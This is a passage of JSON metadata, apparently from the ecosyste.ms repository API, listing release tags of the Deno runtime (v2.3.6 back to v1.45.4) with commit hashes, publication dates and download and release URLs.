cosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3"